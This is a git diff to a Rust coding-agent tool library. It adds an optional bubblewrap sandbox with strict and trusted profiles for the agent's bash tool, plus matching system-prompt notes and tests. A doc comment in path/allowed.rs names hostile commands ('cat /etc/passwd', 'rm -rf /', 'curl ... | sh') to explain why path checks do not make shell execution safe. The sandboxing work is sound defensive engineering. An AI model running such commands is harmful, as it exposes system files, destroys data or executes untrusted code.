- `tokio` - enables the `tokio` submodule (async) + +pub(crate) mod command; + +#[cfg(feature = "blocking")] +pub mod blocking; +#[cfg(feature = "tokio")] +pub mod tokio; + +pub use crate::LinuxBwrapError; +pub use command::{wrap_command, LinuxBwrapWrappedCommand}; diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/tokio.rs b/src/llm-coding-tools-bubblewrap/src/wrap/tokio.rs new file mode 100644 index 00000000..5fbf709a --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/tokio.rs @@ -0,0 +1,33 @@ +//! Tokio `process-wrap` integration for bubblewrap execution. +//! +//! # Public API +//! +//! - [`build_command_wrap`] — build the async wrapped command + +use super::wrap_command; +use crate::{LinuxBwrapError, Profile}; +use process_wrap::tokio::{CommandWrap, ProcessGroup}; +use std::path::Path; +use std::process::Stdio; + +/// Builds an async [`CommandWrap`] from a [`Profile`]. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError`] on invalid per-command workdir. +pub fn build_command_wrap( + profile: &Profile, + command: &str, + workdir: Option<&Path>, +) -> Result { + let wrapped = wrap_command(profile, command, workdir)?; + + let mut wrap = CommandWrap::with_new(wrapped.program(), |cmd| { + cmd.args(wrapped.args()); + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + wrap.wrap(ProcessGroup::leader()); + Ok(wrap) +} diff --git a/src/llm-coding-tools-core/Cargo.toml b/src/llm-coding-tools-core/Cargo.toml index 35c06566..52058990 100644 --- a/src/llm-coding-tools-core/Cargo.toml +++ b/src/llm-coding-tools-core/Cargo.toml @@ -17,6 +17,7 @@ tokio = [ "async", "dep:tokio", "dep:reqwest", + "llm-coding-tools-bubblewrap?/tokio", "process-wrap/tokio1", "process-wrap/job-object", "process-wrap/process-group", @@ -27,10 +28,13 @@ blocking = [ "maybe-async/is_sync", "dep:reqwest", "reqwest?/blocking", + "llm-coding-tools-bubblewrap?/blocking", "process-wrap/std", "process-wrap/job-object", "process-wrap/process-group", ] +# 
Linux sandbox API support - only exposes types on Linux targets. +linux-bubblewrap = ["dep:llm-coding-tools-bubblewrap"] [dependencies] # Tool outputs (BashOutput, GrepOutput, etc.) serialize to JSON for LLM consumption @@ -93,7 +97,11 @@ process-wrap = { version = "9.1", default-features = false } # Compile-time string formatting for prompt text and parameter descriptions const_format = "0.2.35" +# Linux sandbox types and runtime +llm-coding-tools-bubblewrap = { version = "0.1.0", path = "../llm-coding-tools-bubblewrap", optional = true, default-features = false } + [dev-dependencies] +serial_test = "3" tempfile = "3.27" # For async tests (when async feature enabled) tokio = { version = "1.50", features = ["rt", "macros"] } diff --git a/src/llm-coding-tools-core/README.md b/src/llm-coding-tools-core/README.md index 0d7901c9..17516288 100644 --- a/src/llm-coding-tools-core/README.md +++ b/src/llm-coding-tools-core/README.md @@ -15,6 +15,7 @@ Framework-agnostic core library of standard tools used by coding agents - headle - [Tools, context, and integration](#tools-context-and-integration) - [Standard tools](#standard-tools) - [Path safety and sandboxing](#path-safety-and-sandboxing) + - [Linux shell sandboxing](#linux-shell-sandboxing) - [Context and wrapper mapping](#context-and-wrapper-mapping) - [System prompt builder](#system-prompt-builder) - [Typical wrapper integration (serdesAI)](#typical-wrapper-integration-serdesai) @@ -36,6 +37,7 @@ llm-coding-tools-core = { version = "0.2", default-features = false, features = - `tokio` (default): async runtime support - `blocking`: sync/blocking mode - `async`: internal base async feature (enabled by runtimes, not directly) +- `linux-bubblewrap`: Linux sandboxing support via the `bwrap` (bubblewrap) tool. `tokio` and `blocking` are mutually exclusive.
@@ -84,6 +86,28 @@ fn demo() -> ToolResult<()> { } ``` +#### Linux shell sandboxing + +Enable the `linux-bubblewrap` feature flag to sandbox [`bash`] ([`execute_command`]) +via Linux `bwrap`. This limits visible filesystem, environment, and network +access for executed commands. + +Two profiles are available: + +- **Public Bot** (`Profile::public_bot_defaults`) + Strictest containment for hostile input. No host filesystem access, synthetic + home, memory-backed `/tmp`, network disabled. + +- **Trusted Maintenance** (`Profile::trusted_maintenance_defaults`) + Broader profile for builds and repairs in a more trusted environment. + Read-only host `/` with writable overlays, disk-backed `/tmp`, network enabled. + +We default to the **Public Bot** profile when sandboxing is enabled. In either +case, evaluate whether the chosen profile fits your security needs. + +See [SANDBOX-PROFILES.md](https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md) for the full operator +guide and checklist. + ### Context and wrapper mapping [`context`] provides reusable guidance constants. 
@@ -191,7 +215,7 @@ let agent = AgentBuilder::<(), String>::new(model) .tool(pb.track(ReadTool::::new())) .tool(pb.track(GlobTool::new())) .tool(pb.track(GrepTool::::new())) - .tool(pb.track(BashTool::new())) + .tool(pb.track(BashTool::host())) .system_prompt(pb.build()) .build(); # } diff --git a/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs b/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs index 255cb699..a9ec0f91 100644 --- a/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs +++ b/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs @@ -161,7 +161,10 @@ impl ToolContext for MockBashTool { const NAME: &'static str = tool_metadata::bash::NAME; fn context(&self) -> ToolPrompt { - ToolPrompt::Bash + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false, + } } } diff --git a/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs b/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs index afb408ed..2ed526c7 100644 --- a/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs +++ b/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs @@ -35,7 +35,22 @@ pub enum ToolPrompt { /// Uses a fixed guidance string as-is. Static(&'static str), /// Writes guidance for `bash`. - Bash, + Bash { + /// Whether network access is disabled for the bash execution. + /// + /// When `true`, the rendered prompt includes a note that network access + /// is disabled inside the sandbox. This is only meaningful when + /// `sandboxed` is also `true` - a host-level bash session cannot + /// restrict networking, so the default is `false`. + network_disabled: bool, + /// Whether the bash execution is confined to a Linux sandbox (e.g. bubblewrap). + /// + /// When `true`, the rendered prompt notes that commands run inside a Linux + /// sandbox. Defaults to `false` (unrestricted host execution). Can be + /// combined with `network_disabled`; setting `network_disabled` without + /// `sandboxed` has no effect. 
+ sandboxed: bool, + }, /// Writes guidance for `read`. Read { path_mode: PathMode, @@ -114,7 +129,7 @@ impl ToolPromptFacts { fn record(&mut self, prompt: ToolPrompt) { match prompt { ToolPrompt::Static(_) => {} - ToolPrompt::Bash => self.has_bash = true, + ToolPrompt::Bash { .. } => self.has_bash = true, ToolPrompt::Read { path_mode, line_numbers, diff --git a/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs b/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs index 300a66c7..72497c34 100644 --- a/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs +++ b/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs @@ -19,7 +19,10 @@ use crate::tool_metadata::{bash, edit, glob, grep, read, webfetch}; pub(super) fn render_tool(prompt: ToolPrompt, output: &mut String, facts: ToolPromptFacts) { match prompt { ToolPrompt::Static(text) => output.push_str(text), - ToolPrompt::Bash => write_bash_section(output), + ToolPrompt::Bash { + network_disabled, + sandboxed, + } => write_bash_section(output, network_disabled, sandboxed), ToolPrompt::Read { path_mode: _, line_numbers, @@ -38,17 +41,24 @@ pub(super) fn render_tool(prompt: ToolPrompt, output: &mut String, facts: ToolPr } } -fn write_bash_section(output: &mut String) { +fn write_bash_section(output: &mut String, network_disabled: bool, sandboxed: bool) { push_block( output, formatcp!( "- Use it for terminal work (git, package managers, test runners, docker) and shell-native search/filter jobs the specialized tools do not handle well.\n\ - - Output includes stdout, stderr under `[stderr]`, and non-zero exit codes as `[exit code: N]`.\n\ - - For independent commands, make parallel `{}` calls. For dependent commands, use one call with `&&`.\n\ - - Quote paths that contain spaces.\n", + - Output includes stdout, stderr under `[stderr]`, and non-zero exit codes as `[exit code: N]`.\n\ + - For independent commands, make parallel `{}` calls. 
For dependent commands, use one call with `&&`.\n\ + - Quote paths that contain spaces.\n", bash::NAME, ), ); + if sandboxed { + push_line(output, "- Commands run inside a Linux sandbox."); + // `network_disabled` only applies to sandboxed execution; it is ignored for host bash. + if network_disabled { + push_line(output, "- Network access is disabled in this sandbox."); + } + } } fn write_read_section(output: &mut String, facts: ToolPromptFacts, line_numbers: bool) { diff --git a/src/llm-coding-tools-core/src/lib.rs b/src/llm-coding-tools-core/src/lib.rs index f87c8fea..1cd0689f 100644 --- a/src/llm-coding-tools-core/src/lib.rs +++ b/src/llm-coding-tools-core/src/lib.rs @@ -31,11 +31,16 @@ pub use system_prompt::SystemPromptBuilder; // Re-export tools (always available, sync or async based on runtime feature) pub use tools::{ - edit_file, execute_command, glob_files, grep_search, read_file, read_todos, write_file, - write_todos, BashOutput, EditError, GlobOutput, GrepFileMatches, GrepLineMatch, GrepOutput, - TaskInput, TaskOutput, TaskSettings, Todo, TodoPriority, TodoState, TodoStatus, + edit_file, execute_command, execute_command_with_mode, glob_files, grep_search, read_file, + read_todos, write_file, write_todos, BashExecutionMode, BashOutput, EditError, GlobOutput, + GrepFileMatches, GrepLineMatch, GrepOutput, TaskInput, TaskOutput, TaskSettings, Todo, + TodoPriority, TodoState, TodoStatus, }; +// Re-export Linux sandbox types (Linux-only, requires linux-bubblewrap feature) +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use tools::linux_bwrap_profile; + // Re-export webfetch tools (requires tokio or blocking feature) #[cfg(any(feature = "tokio", feature = "blocking"))] pub use tools::{fetch_url, format_json, html_to_markdown, WebFetchOutput}; diff --git a/src/llm-coding-tools-core/src/path/allowed.rs b/src/llm-coding-tools-core/src/path/allowed.rs index 8e9b828e..ae2774b9 100644 --- a/src/llm-coding-tools-core/src/path/allowed.rs +++ 
b/src/llm-coding-tools-core/src/path/allowed.rs @@ -25,11 +25,8 @@ use std::sync::Arc; /// 
(e.g., `cat /etc/passwd`, `rm -rf /`, `curl ... | sh`). /// /// This resolver only restricts the structured file operations (`read`, `write`, `edit`, -/// `glob`, `grep`). If your threat model requires actual filesystem sandboxing, you must -/// either: -/// -/// - Disable the bash tool entirely, or -/// - Run the process in an OS-level sandbox (containers, seccomp, landlock, etc.) +/// `glob`, `grep`). It does not make shell execution safe. +/// See `SANDBOX-PROFILES.md` for details on sandboxing on Linux. #[derive(Debug, Clone)] pub struct AllowedPathResolver { /// Canonicalized allowed base directories. diff --git a/src/llm-coding-tools-core/src/system_prompt.rs b/src/llm-coding-tools-core/src/system_prompt.rs index 5e389185..53be8187 100644 --- a/src/llm-coding-tools-core/src/system_prompt.rs +++ b/src/llm-coding-tools-core/src/system_prompt.rs @@ -465,7 +465,14 @@ mod tests { built_in_path_tool!(BuiltInEditTool, edit::NAME, Edit); built_in_path_tool!(BuiltInGlobTool, glob::NAME, Glob); built_in_path_tool_with_line_numbers!(BuiltInGrepTool, grep::NAME, Grep); - built_in_tool!(BuiltInBashTool, bash::NAME, ToolPrompt::Bash); + built_in_tool!( + BuiltInBashTool, + bash::NAME, + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false + } + ); built_in_tool!(BuiltInTaskTool, task::NAME, ToolPrompt::Task); fn assert_no_triple_newlines(preamble: &str) { @@ -1187,4 +1194,51 @@ mod tests { assert!(!preamble.contains("`glob` on one or a few files is enough")); assert!(!preamble.contains("`grep` on one or a few files is enough")); } + + #[test] + fn bash_section_conditional_lines() { + struct SandboxedBashTool; + + impl ToolContext for SandboxedBashTool { + const NAME: &'static str = bash::NAME; + fn context(&self) -> ToolPrompt { + ToolPrompt::Bash { + network_disabled: true, + sandboxed: true, + } + } + } + + struct HostBashTool; + + impl ToolContext for HostBashTool { + const NAME: &'static str = bash::NAME; + fn context(&self) -> ToolPrompt { + 
ToolPrompt::Bash { + network_disabled: false, + sandboxed: false, + } + } + } + + let mut pb = SystemPromptBuilder::new().working_directory("/home/user/project"); + let _ = pb.track(SandboxedBashTool); + let sandboxed = pb.build(); + + let mut pb = SystemPromptBuilder::new().working_directory("/home/user/project"); + let _ = pb.track(HostBashTool); + let host = pb.build(); + + // Sandboxed: both conditional lines present, network line exactly once. + let network_lines: Vec<_> = sandboxed + .lines() + .filter(|l| l.contains("Network access is disabled in this sandbox.")) + .collect(); + assert_eq!(network_lines.len(), 1); + assert!(sandboxed.contains("Commands run inside a Linux sandbox.")); + + // Host: neither conditional line present. + assert!(!host.contains("Network access is disabled")); + assert!(!host.contains("Commands run inside a Linux sandbox")); + } } diff --git a/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs b/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs index e09bcc06..8c9e16d4 100644 --- a/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs +++ b/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs @@ -1,10 +1,12 @@ //! Blocking shell command execution. 
use super::{ - timeout_error_with_kill_failure, timeout_message_with_buffered_output, BashOutput, - PIPE_BUFFER_CAPACITY, + timeout_error_with_kill_failure, timeout_message_with_buffered_output, validate_workdir, + BashExecutionMode, BashOutput, PIPE_BUFFER_CAPACITY, }; use crate::error::{ToolError, ToolResult}; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::wrap::blocking as linux_bwrap_wrap; use process_wrap::std::*; use std::io::Read; use std::path::Path; @@ -28,49 +30,45 @@ pub fn execute_command( workdir: Option<&Path>, timeout: Duration, ) -> ToolResult { - if let Some(dir) = workdir { - if !dir.is_absolute() { - return Err(ToolError::InvalidPath(format!( - "working directory must be an absolute path: {}", - dir.display() - ))); - } - if !dir.is_dir() { - return Err(ToolError::InvalidPath(format!( - "working directory does not exist: {}", - dir.display() - ))); - } - } - - #[cfg(windows)] - let mut wrap = CommandWrap::with_new("cmd", |cmd| { - cmd.args(["/C", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); - } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); + execute_command_with_mode(&BashExecutionMode::Host, command, workdir, timeout) +} - #[cfg(not(windows))] - let mut wrap = CommandWrap::with_new("bash", |cmd| { - cmd.args(["-c", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); +/// Executes a shell command with explicit mode selection. +/// +/// # Arguments +/// - `mode` - The execution mode (host or Linux sandbox). +/// - `command` - The shell command to execute. +/// - `workdir` - Optional working directory (must be absolute if provided). +/// - `timeout` - Maximum time to wait for command completion. +/// +/// # Errors +/// - Returns [`ToolError::InvalidPath`] if workdir is not absolute or doesn't exist. +/// - Returns [`ToolError::Execution`] for sandbox mode when bwrap is missing or unusable. 
+/// - Returns [`ToolError::Timeout`] or [`ToolError::TimeoutWithKillFailure`] on timeout. +pub fn execute_command_with_mode( + mode: &BashExecutionMode, + command: &str, + workdir: Option<&Path>, + timeout: Duration, +) -> ToolResult { + let wrap = match mode { + BashExecutionMode::Host => build_host_wrap(command, workdir), + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + BashExecutionMode::LinuxBwrap(config) => { + linux_bwrap_wrap::build_command_wrap(config, command, workdir) + .map_err(super::map_linux_bwrap_error) } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); - - // Add platform-specific process tree management - #[cfg(windows)] - wrap.wrap(JobObject); - #[cfg(unix)] - wrap.wrap(ProcessGroup::leader()); + }?; + run_wrapped_command(wrap, timeout) +} +/// Runs a wrapped command with timeout, concurrent pipe draining, and proper cleanup. +/// +/// This is the shared implementation for both host and sandbox execution in blocking mode. 
+pub(in crate::tools::bash) fn run_wrapped_command( + mut wrap: CommandWrap, + timeout: Duration, +) -> ToolResult { let mut child = wrap .spawn() .map_err(|e| ToolError::Execution(e.to_string()))?; @@ -139,6 +137,39 @@ pub fn execute_command( } } +fn build_host_wrap(command: &str, workdir: Option<&Path>) -> ToolResult { + validate_workdir(workdir)?; + + #[cfg(windows)] + let mut wrap = CommandWrap::with_new("cmd", |cmd| { + cmd.args(["/C", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(not(windows))] + let mut wrap = CommandWrap::with_new("bash", |cmd| { + cmd.args(["-c", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(windows)] + wrap.wrap(JobObject); + #[cfg(unix)] + wrap.wrap(ProcessGroup::leader()); + + Ok(wrap) +} + #[cfg(test)] mod tests { use super::*; diff --git a/src/llm-coding-tools-core/src/tools/bash/mod.rs b/src/llm-coding-tools-core/src/tools/bash/mod.rs index 1ec3a033..b6626a97 100644 --- a/src/llm-coding-tools-core/src/tools/bash/mod.rs +++ b/src/llm-coding-tools-core/src/tools/bash/mod.rs @@ -1,10 +1,65 @@ -//! Shell command execution operation. - -use crate::error::ToolError; +//! Run shell commands on the host or inside a Linux bubblewrap sandbox. +//! +//! # Public API +//! - [`execute_command`] / [`execute_command_with_mode`] - Run a shell command with host or sandbox mode. +//! - [`BashExecutionMode`] - Select `Host` or `LinuxBwrap` execution. +//! - [`BashOutput`] - Captured stdout, stderr, and exit code. +//! +//! # Linux Sandbox +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "Enable the `linux-bubblewrap` feature on Linux to wrap commands in a bubblewrap sandbox." 
+)] +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "Build a profile with `linux_bwrap_profile::Builder`:" +)] +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "- `Builder::public_bot` for untrusted input (no network, filtered mounts, cleared env)." +)] +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "- `Builder::trusted_maintenance` for trusted jobs (network enabled, read-only host rootfs)." +)] +//! +//! See +//! <https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md> for the full operator guide. +//! +//! # Errors +//! - [`ToolError::InvalidPath`] when the working directory is not absolute or does not exist. +//! - [`ToolError::Execution`] when the process cannot start, or when `bwrap` is missing or unusable in sandbox mode. +//! - [`ToolError::Timeout`] / [`ToolError::TimeoutWithKillFailure`] when the command exceeds the deadline. + +use crate::error::{ToolError, ToolResult}; use crate::ToolOutput; use core::fmt::Write; use serde::Serialize; +use std::path::Path; use std::time::Duration; +#[cfg(feature = "tokio")] +mod tokio_impl; +#[cfg(feature = "tokio")] +pub use tokio_impl::{execute_command, execute_command_with_mode}; + +#[cfg(all(feature = "blocking", not(feature = "tokio")))] +mod blocking_impl; +#[cfg(all(feature = "blocking", not(feature = "tokio")))] +pub use blocking_impl::{execute_command, execute_command_with_mode}; + +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use llm_coding_tools_bubblewrap::profile as linux_bwrap_profile; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::profile::Profile; + +/// Execution mode for bash commands. 
+#[derive(Debug, Clone, PartialEq, Eq, Default)] +pub enum BashExecutionMode { + #[default] + Host, + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + LinuxBwrap(std::sync::Arc<Profile>), +} /// Default buffer capacity for stdout/stderr pipe reads. 
/// 32KB covers typical command output without reallocations. @@ -49,6 +104,27 @@ fn timeout_error_with_kill_failure(message: String, kill_error: Option) } } +#[inline] +fn validate_workdir(workdir: Option<&Path>) -> ToolResult<()> { + if let Some(dir) = workdir { + if !dir.is_absolute() { + return Err(ToolError::InvalidPath(format!( + "working directory must be an absolute path: {}", + dir.display() + ))); + } + if !dir.is_dir() { + let msg = if dir.exists() { + format!("working directory is not a directory: {}", dir.display()) + } else { + format!("working directory does not exist: {}", dir.display()) + }; + return Err(ToolError::InvalidPath(msg)); + } + } + Ok(()) +} + /// Result of shell command execution. #[derive(Debug, Clone, Serialize)] pub struct BashOutput { @@ -97,12 +173,30 @@ impl BashOutput { } } -#[cfg(feature = "tokio")] -mod tokio_impl; -#[cfg(feature = "tokio")] -pub use tokio_impl::execute_command; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +#[inline] +fn map_linux_bwrap_error(error: llm_coding_tools_bubblewrap::LinuxBwrapError) -> ToolError { + use llm_coding_tools_bubblewrap::LinuxBwrapError; + match error { + LinuxBwrapError::InvalidPath(message) => ToolError::InvalidPath(message), + LinuxBwrapError::Execution(message) => ToolError::Execution(message), + } +} -#[cfg(all(feature = "blocking", not(feature = "tokio")))] -mod blocking_impl; -#[cfg(all(feature = "blocking", not(feature = "tokio")))] -pub use blocking_impl::execute_command; +#[cfg(all(test, feature = "linux-bubblewrap", target_os = "linux"))] +mod tests { + use super::*; + + #[test] + fn bwrap_error_mapping_preserves_variants() { + let mapped = map_linux_bwrap_error( + llm_coding_tools_bubblewrap::LinuxBwrapError::Execution("bwrap missing".to_string()), + ); + assert!(matches!(mapped, ToolError::Execution(m) if m.contains("bwrap"))); + + let mapped = map_linux_bwrap_error( + llm_coding_tools_bubblewrap::LinuxBwrapError::InvalidPath("bad path".to_string()), + ); 
+ assert!(matches!(mapped, ToolError::InvalidPath(m) if m.contains("bad"))); + } +} diff --git a/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs b/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs index 4b60b954..df9b4713 100644 --- a/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs +++ b/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs @@ -1,10 +1,12 @@ //! Tokio-based async shell command execution. use super::{ - timeout_error_with_kill_failure, timeout_message_with_buffered_output, BashOutput, - PIPE_BUFFER_CAPACITY, + timeout_error_with_kill_failure, timeout_message_with_buffered_output, validate_workdir, + BashExecutionMode, BashOutput, PIPE_BUFFER_CAPACITY, }; use crate::error::{ToolError, ToolResult}; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::wrap::tokio as linux_bwrap_wrap; use parking_lot::Mutex; use process_wrap::tokio::*; use std::path::Path; @@ -91,49 +93,45 @@ pub async fn execute_command( workdir: Option<&Path>, timeout: Duration, ) -> ToolResult { - if let Some(dir) = workdir { - if !dir.is_absolute() { - return Err(ToolError::InvalidPath(format!( - "working directory must be an absolute path: {}", - dir.display() - ))); - } - if !dir.is_dir() { - return Err(ToolError::InvalidPath(format!( - "working directory does not exist: {}", - dir.display() - ))); - } - } - - #[cfg(windows)] - let mut wrap = CommandWrap::with_new("cmd", |cmd| { - cmd.args(["/C", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); - } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); + execute_command_with_mode(&BashExecutionMode::Host, command, workdir, timeout).await +} - #[cfg(not(windows))] - let mut wrap = CommandWrap::with_new("bash", |cmd| { - cmd.args(["-c", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); +/// Executes a shell command with explicit mode selection. 
+/// +/// # Arguments +/// - `mode` - The execution mode (host or Linux sandbox). +/// - `command` - The shell command to execute. +/// - `workdir` - Optional working directory (must be absolute if provided). +/// - `timeout` - Maximum time to wait for command completion. +/// +/// # Errors +/// - Returns [`ToolError::InvalidPath`] if workdir is not absolute or doesn't exist. +/// - Returns [`ToolError::Execution`] for sandbox mode when bwrap is missing or unusable. +/// - Returns [`ToolError::Timeout`] or [`ToolError::TimeoutWithKillFailure`] on timeout. +pub async fn execute_command_with_mode( + mode: &BashExecutionMode, + command: &str, + workdir: Option<&Path>, + timeout: Duration, +) -> ToolResult { + let wrap = match mode { + BashExecutionMode::Host => build_host_wrap(command, workdir), + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + BashExecutionMode::LinuxBwrap(config) => { + linux_bwrap_wrap::build_command_wrap(config, command, workdir) + .map_err(super::map_linux_bwrap_error) } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); - - // Add platform-specific process tree management - #[cfg(windows)] - wrap.wrap(JobObject); - #[cfg(unix)] - wrap.wrap(ProcessGroup::leader()); + }?; + run_wrapped_command(wrap, timeout).await +} +/// Runs a wrapped command with timeout, concurrent pipe draining, and proper cleanup. +/// +/// This is the shared implementation for both host and sandbox execution on tokio. 
+pub(in crate::tools::bash) async fn run_wrapped_command( + mut wrap: CommandWrap, + timeout: Duration, +) -> ToolResult { let mut child: Box = wrap .spawn() .map_err(|e| ToolError::Execution(e.to_string()))?; @@ -189,6 +187,39 @@ pub async fn execute_command( } } +fn build_host_wrap(command: &str, workdir: Option<&Path>) -> ToolResult { + validate_workdir(workdir)?; + + #[cfg(windows)] + let mut wrap = CommandWrap::with_new("cmd", |cmd| { + cmd.args(["/C", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(not(windows))] + let mut wrap = CommandWrap::with_new("bash", |cmd| { + cmd.args(["-c", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(windows)] + wrap.wrap(JobObject); + #[cfg(unix)] + wrap.wrap(ProcessGroup::leader()); + + Ok(wrap) +} + #[cfg(test)] mod tests { use super::*; diff --git a/src/llm-coding-tools-core/src/tools/mod.rs b/src/llm-coding-tools-core/src/tools/mod.rs index 3b4d1bbe..02f8c588 100644 --- a/src/llm-coding-tools-core/src/tools/mod.rs +++ b/src/llm-coding-tools-core/src/tools/mod.rs @@ -14,7 +14,9 @@ pub mod task; pub mod todo; pub mod write; -pub use bash::{execute_command, BashOutput}; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use bash::linux_bwrap_profile; +pub use bash::{execute_command, execute_command_with_mode, BashExecutionMode, BashOutput}; pub use edit::{edit_file, EditError}; pub use glob::{glob_files, GlobOutput}; pub use grep::{grep_search, GrepFileMatches, GrepLineMatch, GrepOutput, DEFAULT_MAX_LINE_LENGTH}; diff --git a/src/llm-coding-tools-serdesai/Cargo.toml b/src/llm-coding-tools-serdesai/Cargo.toml index 363fc04d..c40764c6 100644 --- a/src/llm-coding-tools-serdesai/Cargo.toml +++ b/src/llm-coding-tools-serdesai/Cargo.toml @@ -43,6 +43,11 @@ huggingface = 
["serdes-ai-models/huggingface"] mistral = ["serdes-ai-models/mistral"] ollama = ["serdes-ai-models/ollama"] openrouter = ["serdes-ai-models/openrouter"] +# Sandbox feature - enables bubblewrap sandboxing +linux-bubblewrap = [ + "dep:llm-coding-tools-bubblewrap", + "llm-coding-tools-core/linux-bubblewrap", +] [dependencies] # Core tool operations (file read/write/edit, glob, grep, bash, etc.) @@ -50,6 +55,10 @@ llm-coding-tools-core = { version = "0.2.0", path = "../llm-coding-tools-core", "tokio", ] } +# Linux sandboxing via bubblewrap. +# Provides sandbox profiles, presets, and sandbox availability detection. +llm-coding-tools-bubblewrap = { version = "0.1.0", path = "../llm-coding-tools-bubblewrap", optional = true } + # Generic agent runtime dependencies llm-coding-tools-agents = { version = "0.1.0", path = "../llm-coding-tools-agents" } @@ -76,6 +85,7 @@ reqwest = { version = "0.13", default-features = false, features = [ ] } [dev-dependencies] +serial_test = "3" tokio = { version = "1", features = ["macros", "rt-multi-thread"] } tempfile = "3" wiremock = "0.6" diff --git a/src/llm-coding-tools-serdesai/README.md b/src/llm-coding-tools-serdesai/README.md index 505f9338..8a2a126d 100644 --- a/src/llm-coding-tools-serdesai/README.md +++ b/src/llm-coding-tools-serdesai/README.md @@ -2,18 +2,7 @@ [![Crates.io](https://img.shields.io/crates/v/llm-coding-tools-serdesai.svg)](https://crates.io/crates/llm-coding-tools-serdesai) [![Docs.rs](https://docs.rs/llm-coding-tools-serdesai/badge.svg)](https://docs.rs/llm-coding-tools-serdesai) -Lightweight, high-performance serdesAI framework Tool implementations for coding tools. 
- -## Features - -- **File operations** - Read, write, edit, glob, grep with two access modes: - - `absolute::*` - Unrestricted filesystem access - - `allowed::*` - Sandboxed to configured directories -- **Shell execution** - Cross-platform command execution with timeout -- **Web fetching** - URL content retrieval with format conversion -- **Todo management** - Shared-state todo list tracking -- **Context strings** - LLM guidance text for tool usage (re-exported from core) -- **Schema builders** - Composable helpers for custom tool definitions +Lightweight, high-performance serdesAI implementation for [llm-coding-tools]. ## Installation @@ -29,9 +18,9 @@ llm-coding-tools-serdesai = "0.2" Minimal runnable agent (requires `OPENAI_API_KEY`): ```rust,no_run -use llm_coding_tools_serdesai::absolute::{GlobTool, GrepTool, ReadTool}; +use llm_coding_tools_serdesai::absolute::{EditTool, GlobTool, GrepTool, ReadTool}; use llm_coding_tools_serdesai::agent_ext::AgentBuilderExt; -use llm_coding_tools_serdesai::{BashTool, SystemPromptBuilder, create_todo_tools}; +use llm_coding_tools_serdesai::{BashTool, SystemPromptBuilder, WebFetchTool, create_todo_tools}; use serdes_ai::prelude::*; #[tokio::main] @@ -44,7 +33,9 @@ async fn main() -> std::result::Result<(), Box> { .tool(pb.track(ReadTool::::new())) .tool(pb.track(GlobTool::new())) .tool(pb.track(GrepTool::::new())) - .tool(pb.track(BashTool::new())) + .tool(pb.track(EditTool::new())) + .tool(pb.track(BashTool::host())) + .tool(pb.track(WebFetchTool::new())) .tool(pb.track(todo_read)) .tool(pb.track(todo_write)) .system_prompt(pb.build()) // Last, after tracking all tools @@ -70,8 +61,8 @@ File tools come in two variants with identical APIs: - **`allowed::*`** - Sandboxed to configured directories via 